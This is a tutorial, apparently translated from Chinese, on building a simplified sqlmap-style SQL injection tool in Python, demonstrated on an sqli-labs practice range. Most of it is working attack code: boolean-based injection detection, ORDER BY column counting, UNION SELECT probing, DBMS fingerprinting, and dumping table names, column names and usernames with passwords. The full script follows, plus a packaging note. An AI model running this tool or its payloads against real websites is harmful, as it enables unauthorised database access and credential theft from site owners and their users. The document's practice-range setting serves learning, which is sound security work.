First Steps in Network Security --- Building a Simple sqlmap



Background

I have been studying network security for a while. Having grown used to tools written by other people, I decided to write a simple, entry-level tool of my own to practice with.

Demo

  1. Open an sqli-labs range as the test site.
![First Steps in Network Security --- Building a Simple sqlmap](https://p6-tt.byteimg.com/large/pgc-image/38848ebcda6b48f282ebc31c6d82f896?from=pc)

  2. Grab its URL: 96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/inde…

  3. Run the program.

![First Steps in Network Security --- Building a Simple sqlmap](https://p6-tt.byteimg.com/large/pgc-image/561f5bf618484cb0a0d5a22cc516e17e?from=pc)

Code Walkthrough

  1. First, test whether the site is injectable by closing single/double quotes and comparing boolean conditions (AND 1=1 vs AND 1=2).

    def can_inject(text_url):
        text_list = ["%27", "%22"]
        for item in text_list:
            target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
            target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
            result1 = send_request(target_url1)
            result2 = send_request(target_url2)
            soup1 = BeautifulSoup(result1, 'html.parser')
            fonts1 = soup1.find_all('font')
            content1 = str(fonts1[2].text)
            soup2 = BeautifulSoup(result2, 'html.parser')
            fonts2 = soup2.find_all('font')
            content2 = str(fonts2[2].text)
            if content1.find('Login') != -1 and (content2 is None or content2.strip() == ''):
                log('Injection found using ' + item)
                return True, item
            else:
                log('No injection found using ' + item)
        return False, None
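Decoded, the two probe URLs built by this detection step differ only in the boolean tail. A minimal sketch (the target URL here is hypothetical, not from the demo site):

```python
from urllib.parse import unquote

# Hypothetical sqli-labs style target; ?id= is the injectable parameter
base = "http://example.com/Less-1/index.php?id=1"
payload_true = base + "%27" + "%20" + "and%201=1%20--+"
payload_false = base + "%27" + "%20" + "and%201=2%20--+"

# The server sees a closed quote followed by a boolean condition
print(unquote(payload_true))   # ...?id=1' and 1=1 --+
print(unquote(payload_false))  # ...?id=1' and 1=2 --+
```

If the page renders normally for `1=1` but breaks (or comes back empty) for `1=2`, the parameter is evaluated by the database, which is exactly what `can_inject` checks.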

  2. If an injection point is found, determine the number of columns with ORDER BY.

    def text_order_by(url, symbol):
        flag = 0
        for i in range(1, 100):
            log('Probing column ' + str(i))
            text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
            result = send_request(text_url)
            soup = BeautifulSoup(result, 'html.parser')
            fonts = soup.find_all('font')
            content = str(fonts[2].text)
            if content.find('Login') == -1:
                log('Column count found -> ' + str(i) + ' columns')
                flag = i
                break
        return flag
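The probing logic can be exercised offline with a stub in place of the HTTP request; everything in this sketch is illustrative, not part of the original tool. It simulates a query whose result set has 3 columns, so ORDER BY first breaks at 4:

```python
# Stand-in for the ORDER BY probe: page_ok(i) returns True while
# "ORDER BY i" still renders the normal page, False once it errors.
def find_order_by_break(page_ok, max_cols=100):
    for i in range(1, max_cols):
        if not page_ok(i):
            return i  # first failing index; the real column count is i - 1
    return 0

flag = find_order_by_break(lambda i: i <= 3)  # simulate 3 columns
print(flag)  # 4 -> range(1, flag) later enumerates columns 1..3
```

Note that the returned value is the first *failing* index, which is why the later UNION SELECT builders iterate `range(1, flag)`.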

  3. Once the column count is known, use a UNION SELECT to find which column position is echoed back into the page.

    def text_union_select(url, symbol, flag):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == flag - 1:
                text_url += str(i) + "%20--+"
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        for i in range(1, flag):
            if content.find(str(i)) != -1:
                temp_list = content.split(str(i))
                return i, temp_list
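The `temp_list` returned here is the key trick: once the bare digit `i` shows up in the page, splitting the page text on that digit yields the text immediately before and after the echoed slot, and every later payload is recovered by splitting on those two markers. A sketch with made-up page text:

```python
# Made-up page text where column 3 is echoed back
content = "Your Login name:3Your Password:x"
i = 3
temp_list = content.split(str(i))  # markers around the output slot

# A later injection (e.g. version()) lands between the same markers
later = "Your Login name:8.0.22Your Password:x"
value = later.split(temp_list[0])[1].split(temp_list[1])[0]
print(value)  # 8.0.22
```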

  4. Determine the DBMS type by triggering an error page and inspecting its content.

    def get_database(url, symbol):
        text_url = url + symbol + "aaaaaaaaa"
        result = send_request(text_url)
        if result.find('MySQL') != -1:
            return "MySQL"
        elif result.find('Oracle') != -1:
            return "Oracle"

  5. Get the table names.

    def get_tables(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(table_name)" + ","
            elif i == flag - 1:
                text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

  6. Get the column names.

    def get_columns(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(column_name)" + ","
            elif i == flag - 1:
                text_url += str(i) + "%20from%20information_schema.columns%20where%20" \
                            "table_name='users'%20and%20table_schema=database()%20--+"
            else:
                text_url += str(i) + ','
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

  7. Get the row data.

    def get_data(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
            elif i == flag - 1:
                text_url += str(i) + '%20from%20users%20--+'
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

  8. Finally, loop over the extracted data and print each field in the output positions.

    datas = get_data(url, symbol, flag, index, temp_list).split(',')
    temp = columns.split(',')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
    for data in datas:
        temp = data.split(':')
        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
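With made-up values for what `get_data()` and `get_columns()` might return, the display step reduces to two nested splits: rows are joined by `,` (from `group_concat`), fields by `:` (the `0x3a` separator). The sample rows below are the stock sqli-labs users, used purely for illustration:

```python
# Hypothetical extracted strings
raw = "1:Dumb:Dumb,2:Angelina:I-kill-you"
columns = "id,username,password"

header = columns.split(',')
print('%-12s%-12s%-12s' % (header[0], header[1], header[2]))
for row in raw.split(','):
    f = row.split(':')
    print('%-12s%-12s%-12s' % (f[0], f[1], f[2]))
```

The `%-12s` format left-aligns each field in a 12-character column, producing a simple fixed-width table.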

Full Code

    ### imitate_sqlmap.py
    import time, requests
    from bs4 import BeautifulSoup

    def log(content):
        this_time = time.strftime('%H:%M:%S', time.localtime(time.time()))
        print("[" + str(this_time) + "]" + content)

    def send_request(url):
        res = requests.get(url)
        result = str(res.text)
        return result

    def can_inject(text_url):
        text_list = ["%27", "%22"]
        for item in text_list:
            target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
            target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
            result1 = send_request(target_url1)
            result2 = send_request(target_url2)
            soup1 = BeautifulSoup(result1, 'html.parser')
            fonts1 = soup1.find_all('font')
            content1 = str(fonts1[2].text)
            soup2 = BeautifulSoup(result2, 'html.parser')
            fonts2 = soup2.find_all('font')
            content2 = str(fonts2[2].text)
            if content1.find('Login') != -1 and (content2 is None or content2.strip() == ''):
                log('Injection found using ' + item)
                return True, item
            else:
                log('No injection found using ' + item)
        return False, None

    def text_order_by(url, symbol):
        flag = 0
        for i in range(1, 100):
            log('Probing column ' + str(i))
            text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
            result = send_request(text_url)
            soup = BeautifulSoup(result, 'html.parser')
            fonts = soup.find_all('font')
            content = str(fonts[2].text)
            if content.find('Login') == -1:
                log('Column count found -> ' + str(i) + ' columns')
                flag = i
                break
        return flag

    def get_prefix_url(url):
        splits = url.split('=')
        splits.remove(splits[-1])
        prefix_url = ''
        for item in splits:
            prefix_url += str(item)
        return prefix_url

    def text_union_select(url, symbol, flag):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == flag - 1:
                text_url += str(i) + "%20--+"
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        for i in range(1, flag):
            if content.find(str(i)) != -1:
                temp_list = content.split(str(i))
                return i, temp_list

    def exec_function(url, symbol, flag, index, temp_list, function):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += function + ","
            elif i == flag - 1:
                text_url += str(i) + "%20--+"
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

    def get_database(url, symbol):
        text_url = url + symbol + "aaaaaaaaa"
        result = send_request(text_url)
        if result.find('MySQL') != -1:
            return "MySQL"
        elif result.find('Oracle') != -1:
            return "Oracle"

    def get_tables(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(table_name)" + ","
            elif i == flag - 1:
                text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

    def get_columns(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(column_name)" + ","
            elif i == flag - 1:
                text_url += str(i) + "%20from%20information_schema.columns%20where%20" \
                            "table_name='users'%20and%20table_schema=database()%20--+"
            else:
                text_url += str(i) + ','
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

    def get_data(url, symbol, flag, index, temp_list):
        prefix_url = get_prefix_url(url)
        text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
        for i in range(1, flag):
            if i == index:
                text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
            elif i == flag - 1:
                text_url += str(i) + '%20from%20users%20--+'
            else:
                text_url += str(i) + ","
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        return content.split(temp_list[0])[1].split(temp_list[1])[0]

    def sqlmap(url):
        log('Welcome to the SQL injection tool')
        log('Running SQL injection test')
        result, symbol = can_inject(url)
        if not result:
            log('No SQL injection vulnerability on this site; exiting')
            return False
        log('SQL injection vulnerability found; please wait')
        flag = text_order_by(url, symbol)
        index, temp_list = text_union_select(url, symbol, flag)
        database = get_database(url, symbol)
        version = exec_function(url, symbol, flag, index, temp_list, 'version()')
        this_database = exec_function(url, symbol, flag, index, temp_list, 'database()')
        log('Current DBMS -> ' + database.strip() + version.strip())
        log('Database name -> ' + this_database.strip())
        tables = get_tables(url, symbol, flag, index, temp_list)
        log('Table names -> ' + tables.strip())
        columns = get_columns(url, symbol, flag, index, temp_list)
        log('Columns -> ' + columns.strip())
        log('Dumping all rows...')
        datas = get_data(url, symbol, flag, index, temp_list).split(',')
        temp = columns.split(',')
        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
        for data in datas:
            temp = data.split(':')
            print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

Packaging as an Executable for PyPI

Just add an entry_points argument in the cfg file. entry_points declares an interface, registered through setuptools, that external code can call directly. Register the entry_points in imitate_sqlmap's setup.py like this:

    setup(
        name='imitate_sqlmap',
        entry_points={
            'imitate_sqlmap.api.sqlmap': [
                'databases=imitate_sqlmap.api.sqlmap.databases:main',
            ],
        },
    )

This setup() call registers an entry point under the imitate_sqlmap.api.sqlmap group. Note that if several other packages also register entry points under imitate_sqlmap.api.sqlmap, then looking up imitate_sqlmap.api.sqlmap will return all of the registered entry points.
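On the consuming side, the registered group can be queried at runtime with the standard library. A sketch (the group name comes from the setup() above; the result is simply empty if no installed package registers under it):

```python
from importlib.metadata import entry_points

GROUP = "imitate_sqlmap.api.sqlmap"

try:
    eps = entry_points(group=GROUP)      # Python 3.10+ keyword form
except TypeError:
    eps = entry_points().get(GROUP, [])  # older dict-style API
matched = [ep.name for ep in eps]
print(matched)  # e.g. ['databases'] once imitate_sqlmap is installed
# Each entry can then be resolved and called: ep.load()()
```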

